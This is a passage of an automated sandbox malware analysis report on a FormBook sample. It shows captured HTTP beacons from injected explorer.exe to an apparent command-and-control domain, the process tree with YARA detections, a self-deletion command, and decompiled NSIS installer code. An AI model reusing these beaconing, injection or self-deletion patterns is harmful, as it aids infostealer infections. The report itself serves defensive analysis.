68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20
                                          Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{
                                          Sep 27, 2021 21:07:12.270634890 CEST6460INData Raw: 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20
                                          Data Ascii: color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #428
                                          Sep 27, 2021 21:07:12.270663023 CEST6462INData Raw: 64 74 68 3a 20 37 35 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 5b 63 6c 61 73 73 5e 3d 22 63 6f 6c 2d 6d 64 2d 22 5d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20
                                          Data Ascii: dth: 75%; } [class^="col-md-"] { float: left; } .clearfix { clear:both; } @media only screen and (min-device-width : 375px) and (max-device-width : 667px
                                          Sep 27, 2021 21:07:12.270725012 CEST6463INData Raw: 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                          Data Ascii: n: 0; color: #4288ce; display: inline-block; min-width: 100%; box-sizing: border-box; font-size:14px; font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana;
                                          Sep 27, 2021 21:07:12.270749092 CEST6464INData Raw: 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20
                                          Data Ascii: width: 100%; margin: 12px 0; box-sizing: border-box; table-layout:fixed; word-wrap:break-word; } .exception-var table caption{ text-align: left;
                                          Sep 27, 2021 21:07:12.270771027 CEST6466INData Raw: 74 72 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 38 30 20 7d 20 20 2f 2a 20 73 74 72 69 6e 67 20 63 6f 6e 74 65 6e 74 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 6b 77 64 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30
                                          Data Ascii: tr { color: #080 } /* string content */ pre.prettyprint .kwd { color: #008 } /* a keyword */ pre.prettyprint .com { color: #800 } /* a comment */ pre.prettyprint .typ { color: #606 } /* a type name */ pre.pr
                                          Sep 27, 2021 21:07:12.270791054 CEST6466INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.449863202.165.66.10880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:17.622366905 CEST6467OUTGET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1
                                          Host: www.drive16pay.art
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:18.216249943 CEST6467INHTTP/1.1 404 Not Found
                                          Server: nginx/1.21.0
                                          Date: Mon, 27 Sep 2021 19:07:18 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Content-Length: 167
                                          Connection: close
                                          X-Powered-By: Express
                                          ETag: W/"a7-WoatyhJzGlRwwZ9faPbF6C/DR18"
                                          Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 72 39 35 65 2f 3f 35 6a 54 44 79 5a 3d 68 6c 4e 43 62 39 46 4a 43 63 6e 77 73 65 45 70 44 79 63 4f 56 68 79 6e 55 4d 54 2b 6d 4d 75 6c 6e 32 73 43 69 44 2b 48 48 41 47 4d 68 74 39 36 4b 35 7a 69 77 38 4b 5a 34 55 33 38 39 55 66 43 57 58 64 4d 26 6c 32 4d 3d 54 4c 30 30 22 7d
                                          Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00"}


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: DN_467842234567.exe PID: 1088 Parent PID: 6556

                                          General

                                          Start time:21:05:17
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: DN_467842234567.exe PID: 6416 Parent PID: 1088

                                          General

                                          Start time:21:05:18
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 6416

                                          General

                                          Start time:21:05:22
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: WWAHost.exe PID: 4388 Parent PID: 3424

                                          General

                                          Start time:21:05:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\WWAHost.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                          Imagebase:0x10d0000
                                          File size:829856 bytes
                                          MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 5492 Parent PID: 4388

                                          General

                                          Start time:21:05:49
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 5180 Parent PID: 5492

                                          General

                                          Start time:21:05:50
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: DN_467842234567.exe PID: 1088 Parent PID: 6556 DN_467842234567.exeCOMMON

                                            Executed Functions

                                            Function 0040312A, Relevance: 82.6, APIs: 26, Strings: 21, Instructions: 315stringfilecomCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116); // executed
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\jones\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x5f5d20
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\jones\\Desktop\\DN_467842234567.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x5f5d20
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("hyeatlxkvdhyymhha Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\jones\\Desktop\\DN_467842234567.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\jones\\Desktop\\DN_467842234567.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                            0x0040313b
                                            0x0040313f
                                            0x00403147
                                            0x0040314b
                                            0x00403150
                                            0x00403160
                                            0x00403163
                                            0x0040316a
                                            0x00403171
                                            0x00403171
                                            0x0040316a
                                            0x00403173
                                            0x00403173
                                            0x00403289
                                            0x00403289
                                            0x00403289
                                            0x0040328b
                                            0x0040328d
                                            0x00000000
                                            0x00000000
                                            0x00403222
                                            0x00403225
                                            0x0040322d
                                            0x0040322d
                                            0x00403230
                                            0x00403235
                                            0x00403237
                                            0x00403237
                                            0x00403238
                                            0x00403238
                                            0x0040323d
                                            0x00403240
                                            0x00403279
                                            0x0040327e
                                            0x00403283
                                            0x00403286
                                            0x00403288
                                            0x00403288
                                            0x00403288
                                            0x00000000
                                            0x00403242
                                            0x00403242
                                            0x00403243
                                            0x00403246
                                            0x0040324e
                                            0x00403251
                                            0x00403253
                                            0x00403253
                                            0x00403253
                                            0x00403253
                                            0x00403251
                                            0x00403258
                                            0x0040325e
                                            0x00403266
                                            0x00403269
                                            0x0040326b
                                            0x0040326b
                                            0x0040326b
                                            0x0040326b
                                            0x00403269
                                            0x00403270
                                            0x00403277
                                            0x00403291
                                            0x00403294
                                            0x00403294
                                            0x0040329d
                                            0x004032a2
                                            0x004032a2
                                            0x004032ad
                                            0x004032b3
                                            0x004032b8
                                            0x004032ba
                                            0x004032e0
                                            0x004032e5
                                            0x004032ef
                                            0x004032f6
                                            0x004032fa
                                            0x00403361
                                            0x00403361
                                            0x00403366
                                            0x0040336c
                                            0x00403370
                                            0x00403485
                                            0x0040348b
                                            0x00403528
                                            0x00403528
                                            0x0040352d
                                            0x00403530
                                            0x00403532
                                            0x00403532
                                            0x0040353a
                                            0x0040353a
                                            0x0040349a
                                            0x004034a3
                                            0x004034a5
                                            0x004034aa
                                            0x004034ac
                                            0x004034ae
                                            0x004034b0
                                            0x004034b2
                                            0x004034b4
                                            0x004034b6
                                            0x004034c6
                                            0x004034c8
                                            0x004034ca
                                            0x004034d7
                                            0x004034e6
                                            0x004034ee
                                            0x004034f6
                                            0x004034f6
                                            0x004034ca
                                            0x004034b6
                                            0x004034b2
                                            0x004034fa
                                            0x004034ff
                                            0x00403506
                                            0x00403514
                                            0x00403517
                                            0x0040351d
                                            0x0040351f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403508
                                            0x0040350e
                                            0x00403510
                                            0x00403512
                                            0x00403521
                                            0x00403523
                                            0x00000000
                                            0x00403523
                                            0x00000000
                                            0x00403512
                                            0x00403506
                                            0x0040337f
                                            0x00403386
                                            0x00403386
                                            0x004032fc
                                            0x00403302
                                            0x00403351
                                            0x00403351
                                            0x0040335d
                                            0x00000000
                                            0x0040335d
                                            0x0040330b
                                            0x00403318
                                            0x0040330f
                                            0x00403315
                                            0x00000000
                                            0x00000000
                                            0x00403317
                                            0x00403317
                                            0x00403317
                                            0x0040331c
                                            0x0040331e
                                            0x00403326
                                            0x00403397
                                            0x00403399
                                            0x004033a0
                                            0x004033a8
                                            0x004033a8
                                            0x004033b3
                                            0x004033b8
                                            0x004033c7
                                            0x004033cb
                                            0x004033cc
                                            0x004033d5
                                            0x004033ce
                                            0x004033ce
                                            0x004033ce
                                            0x004033db
                                            0x004033e1
                                            0x004033e7
                                            0x004033ef
                                            0x004033ef
                                            0x004033fd
                                            0x00403404
                                            0x0040340d
                                            0x00403413
                                            0x00403413
                                            0x0040341f
                                            0x00403425
                                            0x0040342f
                                            0x00403439
                                            0x0040343f
                                            0x00403441
                                            0x00403443
                                            0x00403444
                                            0x00403445
                                            0x0040344a
                                            0x00403456
                                            0x0040345c
                                            0x00403463
                                            0x00403466
                                            0x0040346c
                                            0x0040346c
                                            0x00403463
                                            0x00403441
                                            0x00403470
                                            0x00403476
                                            0x00403476
                                            0x00403476
                                            0x00403479
                                            0x0040347a
                                            0x0040347b
                                            0x0040347b
                                            0x00000000
                                            0x004033c7
                                            0x00403328
                                            0x0040332a
                                            0x00403335
                                            0x00000000
                                            0x00000000
                                            0x0040333d
                                            0x00403348
                                            0x0040334d
                                            0x00000000
                                            0x0040334d
                                            0x004032c2
                                            0x004032ce
                                            0x004032d3
                                            0x004032d8
                                            0x004032da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403277
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403227
                                            0x00403227
                                            0x00403227
                                            0x00403228
                                            0x00403228
                                            0x00000000
                                            0x00403227
                                            0x00000000
                                            0x00403178
                                            0x00403179
                                            0x00403185
                                            0x0040318b
                                            0x00000000
                                            0x0040318d
                                            0x0040318f
                                            0x00403196
                                            0x0040319b
                                            0x004031a0
                                            0x004031a7
                                            0x004031ad
                                            0x004031c3
                                            0x004031d3
                                            0x004031d8
                                            0x004031de
                                            0x004031e5
                                            0x004031f8
                                            0x004031fd
                                            0x004031ff
                                            0x00403201
                                            0x00403206
                                            0x00403206
                                            0x00403216
                                            0x0040321c
                                            0x00000000
                                            0x0040321c

                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 00403150
                                            • GetVersion.KERNEL32 ref: 00403156
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                            • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                            • OleInitialize.OLE32(00000000), ref: 004031A7
                                            • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                            • GetCommandLineA.KERNEL32(hyeatlxkvdhyymhha Setup,NSIS Error), ref: 004031D8
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\DN_467842234567.exe" ,00000000), ref: 004031EB
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DN_467842234567.exe" ,00409168), ref: 00403216
                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
